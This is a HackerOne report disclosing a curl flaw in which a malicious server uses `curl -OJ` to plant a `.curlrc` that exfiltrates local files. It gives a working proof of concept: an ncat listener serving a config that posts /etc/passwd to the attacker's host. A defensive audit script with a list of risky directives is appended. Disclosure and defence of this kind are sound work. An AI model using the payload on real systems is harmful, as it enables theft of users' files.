HACKERONE

curl: Malicious server forces .curlrc creation via curl -OJ leading to local file exfiltration_H1:3427194

Description

## Summary:
When a user runs `curl -OJ <url>`, a malicious server can force the response to be saved as `.curlrc` in the working directory. If the user executes the download from their home directory (a common workflow), the attacker overwrites `~/.curlrc`. Subsequent `curl` invocations automatically load this configuration file before processing command-line arguments, allowing the attacker to silently exfiltrate local files or proxy future requests.

Used AI to refine the text

## Affected version
```bash
djamelghorab@DESKTOP-VUFM4GM:~$ curl -V
curl 8.5.0 (x86_64-pc-linux-gnu) libcurl/8.5.0 OpenSSL/3.0.13 zlib/1.3 brotli/1.1.0 zstd/1.5.5 libidn2/2.3.7 libpsl/0.21.2 (+libidn2/2.3.7) libssh/0.10.6/openssl/zlib nghttp2/1.59.0 librtmp/2.3 OpenLDAP/2.6.7
Release-Date: 2023-12-06, security patched: 8.5.0-2ubuntu10.6
Protocols: dict file ftp ftps gopher gophers http https imap imaps ldap ldaps mqtt pop3 pop3s rtmp rtsp scp sftp smb smbs smtp smtps telnet tftp
Features: alt-svc AsynchDNS brotli GSS-API HSTS HTTP2 HTTPS-proxy IDN IPv6 Kerberos Largefile libz NTLM PSL SPNEGO SSL threadsafe TLS-SRP UnixSockets zstd
```

## Steps To Reproduce:
1. Start a listener that serves a malicious payload:
```sh
cat <<'EOF' | ncat -l 8000 --keep-open
HTTP/1.1 200 OK
Content-Length: 63
Content-Disposition: attachment; filename=".curlrc"

url = "http://127.0.0.1:8000/leak"
data = "@/etc/passwd"
EOF
```
2. From the target's home directory, download the file with `curl -OJ http://127.0.0.1:8000/pwn`. The transfer creates `~/.curlrc` populated with the attacker's directives.
3. The next time the victim runs a routine command such as `curl https://example.com`, the tool processes the injected configuration first and silently exfiltrates `/etc/passwd` to `http://127.0.0.1:8000/leak` before issuing the user-requested transfer.
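
A defender-side check for the condition described in the steps above, as an added example that is not part of the original report: `audit_curlrc` flags curl config directives that start transfers, send local files, reroute traffic or chain further configs, and `safe_name` rejects a server-chosen file name that is a dotfile or carries a path. The function names and the directive list are assumptions chosen for illustration; the list is not exhaustive.

```shell
#!/bin/sh
# Added example (not from the report). Long option names that deserve review
# when they appear in a curl config file (assumed list, not exhaustive).
RISKY='url|data|data-binary|data-raw|data-urlencode|form|upload-file|proxy|preproxy|config|output'

# audit_curlrc FILE
# Prints "lineno:text" for each risky directive and returns 1 if any is found.
# Config lines may omit the leading dashes and may separate the option from
# its value with whitespace, '=' or ':'; '#' lines are comments and never match.
audit_curlrc() {
    [ -f "$1" ] || return 0        # no config file, nothing to flag
    if grep -nE "^[[:space:]]*((--)?($RISKY)|-[dFTxKo])([[:space:]=:]|\$)" "$1"; then
        return 1
    fi
    return 0
}

# safe_name NAME
# Accepts a server-supplied file name (as used by -J) only if it is non-empty,
# is not a dotfile, and has no path component.
safe_name() {
    case "$1" in
        ''|.*|*/*) return 1 ;;
        *) return 0 ;;
    esac
}

# Audit the current user's config when the script is run directly.
audit_curlrc "${HOME:-.}/.curlrc" || echo "review the directives listed above" >&2
```

Running curl with `-q` as the first argument makes it skip `.curlrc`, which is useful while a flagged file is being reviewed.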

## Supporting Material/References:
{F5010008}

Basic Information

ID H1:3427194
Published Nov 15, 2025 at 15:47
Modified Nov 15, 2025 at 22:32
